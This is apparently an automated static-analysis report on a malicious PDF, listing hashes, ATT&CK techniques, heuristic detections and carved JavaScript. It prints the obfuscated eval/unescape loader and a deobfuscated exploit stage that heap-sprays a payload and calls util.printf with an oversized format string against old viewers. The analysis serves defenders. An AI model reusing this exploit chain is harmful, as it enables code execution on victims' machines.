Malicious PDF / .BIN — malware analysis report

Static analysis result for SHA-256 8847f884506c1a89…

MALICIOUS

PDF / .BIN

Size: 28.7 KB
Created: (timestamp not readable in the source report)
First seen: 2026-05-09
MD5: 00e80904cd0d15e08aff90e498d62b9c
SHA-1: 29b3ce28fea7a7a543f6cae1602013f6ec0b883d
SHA-256: 8847f884506c1a895a9aea8ae9eca1c7caee7fc7f6479dd81119e011015dc2a4
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that is obfuscated and designed to exploit vulnerabilities in PDF viewers. The script utilizes functions like unescape, String.fromCharCode, and util.printf, indicating an attempt to execute arbitrary code. The ML classifier also flagged this PDF as highly malicious. The primary script attempts to download and execute a second-stage payload, which is a common technique for malware delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (5)

  • JavaScript action (severity: low; 2 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Encrypted PDF carries /JavaScript, payload hidden from static analysis (severity: high; rule: PDF_ENCRYPTED_WITH_JS)
    PDF declares /Encrypt and also references an executable trigger (/JavaScript). Document encryption hides the JavaScript body and stream contents from static scanners — combined with auto-execution indicators this is a known evasion pattern used to deliver weaponised JavaScript that the analyst cannot inspect without the decryption key.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size

javascript_obj0017_000.js | pdf-javascript-stream | PDF /JS object 17 at offset 0x410F | 134 bytes
SHA-256: a84216a6a196d23cde2c0ad3a79cee34311530435c6aa9374714ea7d2a19d0e5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
eval(""+''+unescape(this.getField("data").value.replace(new RegExp("\\"+String.fromCharCode(124,65),"g"),String.fromCharCode(37))));
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x10C6 | 995 bytes
SHA-256: a6938e522009382a5f73ef30a45ce3382332361818a2c338c945cc4be3188f4a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Read the viewer version as a digit string and split off the first three digits.
var vv = app.viewerVersion.toString().replace(/\D/g, "");
var vs = new Array();

vs[0] = vv.charAt(0) ? vv.charAt(0) : 0;
vs[1] = vv.charAt(1) ? vv.charAt(1) : 0;
vs[2] = vv.charAt(2) ? vv.charAt(2) : 0;

// Version gate: only continue on older viewers (major < 7, 7.0.x, or 8.0/8.1 with third digit <= 2).
var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if (vva || vvb || vvc) {
  // Decode the payload stored in form field "text": the marker "|A" stands in for "%".
  var sccs = unescape(this.getField("text").value.replace(new RegExp("\\" + String.fromCharCode(124, 65), "g"), String.fromCharCode(37)));

  // Build large repeated string blocks around the decoded payload and keep 1200 copies in memory.
  var bgbl = unescape("%u0A0A" + "%u0A0A");
  var slspc = 20 + sccs.length;
  while (bgbl.length < slspc) bgbl += bgbl;
  var fblk = bgbl.substring(0, slspc);
  var blk = bgbl.substring(0, bgbl.length - slspc);
  while (blk.length + slspc < 0x60000) blk = blk + blk + fblk;

  var mmy = new Array();
  for (i = 0; i < 1200; i++) { mmy[i] = blk + sccs }

  // Build a long numeric string and pass it to util.printf with an oversized format specifier.
  var nm = 12;
  for (i = 0; i < 18; i++) { nm = nm + "9"; }
  for (i = 0; i < 276; i++) { nm = nm + "8"; }

  util.printf(unescape("" + "%" + "254%" + "35000f"), nm);
}

// Close the document without prompting once the script has run.
this.closeDoc(true);
javascript_obj0021_000.js | pdf-javascript-stream | PDF /JS object 21 at offset 0x177C | 134 bytes
SHA-256: 3d7f5c4248fade4a0f7ca93c07aa91d178d83e902ca746c2bdc5ee022cbb0337
Preview script
First 1,000 lines of the extracted script
(extracted stream content is non-printable binary data; no readable script preview is available)